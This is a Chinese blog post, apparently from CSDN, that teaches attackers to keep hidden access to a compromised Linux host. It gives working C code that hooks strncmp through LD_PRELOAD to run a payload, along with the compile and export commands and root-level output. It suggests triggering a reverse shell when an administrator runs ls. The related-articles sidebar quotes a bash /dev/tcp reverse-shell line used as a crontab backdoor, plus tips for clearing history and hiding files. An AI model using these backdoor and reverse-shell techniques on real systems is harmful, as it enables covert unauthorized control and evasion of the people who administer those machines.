【权限维持】linux下使用动态链接库制作隐藏后门

最新推荐文章于 2024-08-11 10:00:00 发布
最新推荐文章于 2024-08-11 10:00:00 发布
阅读量495 收藏
点赞数
文章标签: 系统安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Muxi_k/article/details/130214811
版权

什么是LD_PRELOAD

LD_PRELOAD 是 Linux/Unix 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。

如何利用LD_PRELOAD

由于 LD_PRELOAD 可以指定在程序运行前优先加载的动态链接库,那我们可以重写程序运行过程中所调用的函数并编译成动态链接库文件,然后通过指定 LD_PRELOAD 让程序优先加载的这个恶意的动态链接库,最后当程序再次运行时便会加载动态链接库中的恶意函数。具体的操作步骤如下:

  1. 定义与目标函数完全一样的函数,包括名称、变量及类型、返回值及类型等。
  2. 将包含替换函数的源码编译为动态链接库。
  3. 通过命令 export LD_PRELOAD="库文件路径”,设置要优先替换动态链接库即可
  4. 替换结束,要还原函数调用关系,用命令unset LD_PRELOAD 解除

一个简单的后门思路

当我们得知了一个系统命令所调用的库函数 后,我们可以重写指定的库函数进行劫持。这里我们以 ls 命令为例进行演示。

  1. 首先查看 ls 这一系统命令会调用哪些库函数:
[root@154-91-90-68 ~]# readelf -Ws /usr/bin/ls

Symbol table '.dynsym' contains 129 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND cap_to_text
     5: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND __progname@GLIBC_2.2.5 (3)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND localtime@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __mempcpy_chk@GLIBC_2.3.4 (4)
    11: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
    12: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    13: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)
    14: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND stdout@GLIBC_2.2.5 (3)
    15: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _exit@GLIBC_2.2.5 (3)
    16: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strcpy@GLIBC_2.2.5 (3)
    17: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __fpending@GLIBC_2.2.5 (3)
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND isatty@GLIBC_2.2.5 (3)
    19: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigaction@GLIBC_2.2.5 (3)
    20: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND iswcntrl@GLIBC_2.2.5 (3)
  1. 重写函数库进行劫持

如上图所示可以看到很多库函数,我们随便选择一个合适的进行重写即可,这里我选择的是 strncmp@GLIBC_2.2.5

  • 编写hook_strncmp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
    // 这个函数用来编写或运行你的后门程序
    system(“id”);
}

int strncmp(const char*__s1, const char*__s2, size_t __n) {
    // 这里函数的定义可以根据报错信息进行确定
    if(getenv("LD_PRELOAD") == NULL) {
        return 0;
    }   
    unsetenv("LD_PRELOAD");
    payload();
}
  • 执行命令编译生成 hook_strcmp.so
gcc -shared -fPIC hook_strncmp.c -o hook_strncmp.so
  • 通过环境变量 LD_PRELOAD 来设置 hook_strncmp.so 能被其他调用它的程序优先加载
export LD_PRELOAD=$PWD/hook_strncmp.so
  • 最后执行 ls 发现成功执行了 id 命令, 说明此时成功劫持了 strncmp 函数。
[root@154-91-90-68 /]# ls
uid=0(root) gid=0(root) groups=0(root)
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  patch  proc  root  run  sbin  srv  sys  tmp  usr  var  www

总结

利用这种思路,我们可以制作一个隐藏得 Linux 后门,比如当管理员执行 ls 命令时会反弹一个 Shell

Muxi_k
关注
内网渗透-linux权限维持
lza20001103的博客
08-25 1408
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
Linux系统后门技术(隐藏帐户篇)注:已发表在《黑客手册》第6期
热门推荐
yxyhack's blog
09-25 1万+
  Linux系统后门技术(隐藏帐户篇)        每当我们欢天喜地的得到一个linux系统的服务器肉鸡时,最大的愿望就是能把它永远留住。当然,永远留住是不可能的,但是我们要尽量的不让它飞走。这就要用到linux后门技术了,这是项复杂的技术,本人水平有限不可能面面俱到,我只希望这一系列文章能为大家提供一点思路,在您hacking的道路上打开一扇方便之门!       言归
【一个Linux后门隐藏技巧】
qq_55213436的博客
08-15 1105
根据Linux的系统特性,经过一定的测试发现,Linux操作系对于如:xige.jpg .php类型的文件会识别为:xige.jpg类型的文件。这个是管理员最容易忽视的地方,所以我们只需要在访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php;但是管理员却很难辨认出该木马文件,我们只需要访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php,即可触发这个木马。......
LINUX后门--教程(五)—— crontab隐藏后门
W小哥
07-08 4004
2.3 留crontab隐藏后门 好不容易拿下一个网站,以后还想继续使用该系统,通常都会留下一些后门,本次我们留下一个crontab隐藏后门 我们把1.sh、2.sh 文件放在本地搭建的web服务上,让受害者去下载执行 1.sh文件内容 #!/bin/bash bash -i >& /dev/tcp/192.168.184.145/5555 0>&1 反弹shell到IP地址:192.168.184.145 2.sh文件内容 (crontab -l;printf "* * *
(4/100) linux系统对动态链接库进行加密保护
guaijie0530的博客
05-05 1248
linux系统对动态链接库进行加密保护
linux端口复用隐藏后门
m0_46799123的博客
09-14 731
端口复用实验
Linux rootkit 深度分析 – 第1部分:动态链接器劫持
最新发布
分享web安全、AI安全、云安全、业务安全、渗透测试、安全开发、安全工具、行业动态等优质内容……
08-11 1022
Rootkit 通常是攻击者用来完全控制受感染资源并隐藏恶意活动的一种恶意软件。它们通常是持续性攻击活动的一部分,例如窃取敏感信息或进行间谍活动。Rootkit 可能难以检测和删除,因为它们利用高级技术来隐藏它们在系统上的存在。
动态链接库注入防御】: Linux环境.so注入攻击的防范与检测
[【动态链接库注入防御】: Linux环境.so注入攻击的防范与检测](https://www.linuxprobe.com/wp-content/uploads/2018/03/ddos2-1-1024x513.jpg) # 摘要 本文全面分析了动态链接库(.so文件)注入攻击的技术原理及其...
Linux权限提升总结
m0_66458291的博客
04-01 1667
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。
linux权限维持
whojoe的博客
10-08 537
修改属性 文件时间 touch -r index.php shell.php touch -t 202010101010 shell.php #touch --help 历史操作命令 histroy -r #删除当前会话历史记录 history -c #删除内存中的所有命令历史 rm .bash_history #删除历史文件中的内容 sed -i '150,$d' .bash_history#只保留前150行 set +o history#针对你的工作关闭历史记录 set -o history#恢复 e
如何做一个简单的后门
07-11
加你怎么做简单后门,这是个非常简单的,要用到易语言。
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
警惕利用Linux预加载型恶意动态链接库后门
cleanfield的专栏
01-17 2334
一、动态链接库预加载型rootkit概述 动态链接库预加载机制是系统提供给用户运行自定义动态链接库的一种方式,在可执行程序运行之前就会预先加载用户定义的动态链接库的一种技术,这种技术可以重写系统的库函数,只需要在预加载的链接库中重新定义相同名称的库函数,程序调用库函数时,重新定义的函数即会短路正常的库函数,这种技术可以用来重写系统中有漏洞的库函数,达到修复漏洞的目的,如get_host_byname导致ghost漏洞的这类函数。这种技术也可以被不怀好意的攻击者用来写rootkit,通过重写mkdir, m
Vegile实现linux后门隐藏
weixin_43102772的博客
02-16 1208
Vegile是linux中的权限维持工具。主要用来隐藏后门、和无限循环连接meterpreter来保持回话。 实验环境: 1.attack:kali 192.168.72.131 2.target:centos7 192.168.72.132 3.Vegile、metasploit 一、前期准备 将Vegile上传到kali的 /var/www/html下 kali生成后门程序保存到/var/...
五一也要学习:Linux 静态库与动态库的制作常用知识点总结(如何保密你的代码)
weixin_BESTWISHES0120的博客
05-01 2285
静态库与动态库的制作 1、什么是库:: 库文件是计算机上的一类文件,可以简单的把库文件看成一种代码仓库,它提供使用者可以直接拿来用的变量、函数或类。 库是一种特殊的程序,编写库的程序和编写一般的程序区别不大,只是库不能单独运行。 库文件有两种,静态库和动态库(共享库),区别是:静态库在程序的链接阶段被复制到了程序中;动态库在链接阶段没有被复制到程序中,而是程序在运行时由系统动态加载到内存中供程序调用。 库的好处:1、代码保密 2、方便部署和分发 2、 ...
使用linux系统加密
小易
10-12 701
root@liujie-desktop:/etc/freeradius# python -c 'import crypt; print crypt.crypt("passme","salt")' sa85/iGj2UWlA root@liujie-desktop:/etc/freeradius# perl -e 'print(crypt("passme","salt")."\n");' sa85/
开发笔记:如何对【动态链接库】文件进行加密保护?
yx5666的博客
09-15 1374
这个动态库最终肯定是要被加载到应用程序的内存空间中被使用的,因此在被加载之前,需要被。也就是说:必须要把一个动态库文件的路径传递给该函数,才可以被正确的加载到内存中。个函数在语义上是对应的,唯一的区别是加载函数传入的参数是:缓冲区的地址和长度。此时,如果用户获取到了这个动态库,由于没有秘钥,理论上是无法解开这个文件的。系统上如果也存在类似的需求,是否也有类似的:从内存缓冲区加载动态库的实现?经过测试证明:这个方法工作的很好,很完美的解决了我的问题!文件的使用周期非常短,仍然存在暴露给用户的可能性。
linux4.14 加密框架 —— 静态算法和动态算法
yangguoyu8023的博客
02-17 1375
目录 1. 静态算法和动态算法 2. 创建动态算法 2.1 发布创建动态算法通知 2.2cryptomgr_schedule_probe 2.3cryptomgr_probe 3. 注册动态算法crypto_register_instance 1. 静态算法和动态算法 加密框架中的算法分为静态算法和动态算法两种,其中静态算法指的是以"算法名.ko"形式存在的静态编译的算法模块,如aes.ko表示AES算法模块,md5.ko表示MD5算法模块,这些静态算法模块是预定义的,在...
后门制作及安装技术(全)
【GTA: Vice City】
08-29 4370
后门制作及安装技术摘要  本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. (2002-09-16 13:30:19)后门   声明:此文为翻译文章,QiangGe只做了一些修改,并加入了一些自己的心得及自己所写的程序.  译者 iamtheguest  从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值